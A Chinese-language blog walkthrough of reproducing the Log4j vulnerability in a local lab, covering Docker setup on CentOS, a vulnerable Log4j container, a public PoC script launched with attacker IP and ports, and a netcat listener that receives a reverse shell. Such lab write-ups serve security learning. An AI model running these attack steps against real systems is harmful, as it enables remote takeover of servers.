Log4j漏洞复现
作者:mo_on | 发布时间:
Log4j漏洞复现
漏洞复现环境介绍
局域网 攻击机器:MacOS BigSur 攻击IP:192.168.1.9 目标机器:Centos7 目标IP:192.168.1.16
前期准备
目标机器安装Docker
参考链接 Centos7安装Docker
#更新yum包
yum -y update
#卸载旧版本(如果之前安装过的话)
yum remove docker docker-common docker-selinux docker-engine
#安装需要的软件包
yum install -y yum-utils device-mapper-persistent-data lvm2
#设置yum源
yum-config-manager --add-repo http://download.docker.com/linux/centos/docker-ce.repo(中央仓库)
yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo(阿里仓库)
#查看可用版本
yum list docker-ce --showduplicates | sort -r
#安装docker
yum -y install docker-ce-18.03.1.ce
附一些docker常用命令
#启动docker服务
systemctl start docker
#重启docker服务
systemctl restart docker
#关闭docker服务
systemctl stop docker
#镜像搭建容器
docker run -dt --name '自定义容器名称' -p 80:80 --rm '镜像名称'
#查看所有容器
docker ps -a
#进入容器
docker exec -it 容器ID /bin/bash
docker exec -it 容器ID /bin/sh
#开启容器
docker start 容器ID
#停止容器
docker stop 容器ID
#删除容器
docker rm 容器ID
#删除镜像
docker rmi 容器ID
目标机器搭建漏洞靶场
参考链接 Log4J漏洞复现+漏洞靶场 依次执行命令
#拉取docker镜像
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
#根据镜像搭建容器
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
#进入容器
docker exec -it log4j_vuln_container /bin/bash
#运行apache服务
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
访问漏洞靶场地址:http://192.168.1.16:8080/webstudy/ .jpg)
攻击机器下载配置poc
下载poc项目:kozmer/log4j-shell-poc
安装poc.py运行所需python包
pip3 install colorama
pip3 install argparse
poc.py运行需调用Java1.8,已安装JDK的情况下,修改poc.py中Java_Home路径为本地路径
poc项目已被更新,实际脚本代码与本文截图会略有不同

漏洞复现
目标机器:已运行漏洞靶场环境 攻击机器:运行poc.py脚本,并新开启一个终端设置监听,这里攻击IP为192.168.1.9,http服务端口为8000,反弹shell(监听)端口为9001
#运行poc.py
python3 poc.py --userip 192.168.1.9 --webport 8000 --lport 9001
#新开shell窗口并设置监听
nc -lvn 9001
访问http://192.168.1.16:8080/webstudy/,点击hit me提示我们用post请求,使用hackbar(Burp Suite)来发送post请求,这里漏洞靶场的post请求参数为c,我们发送
查看监听,成功反弹shell
预祝大家复现成功!
原文链接
标签:漏洞复现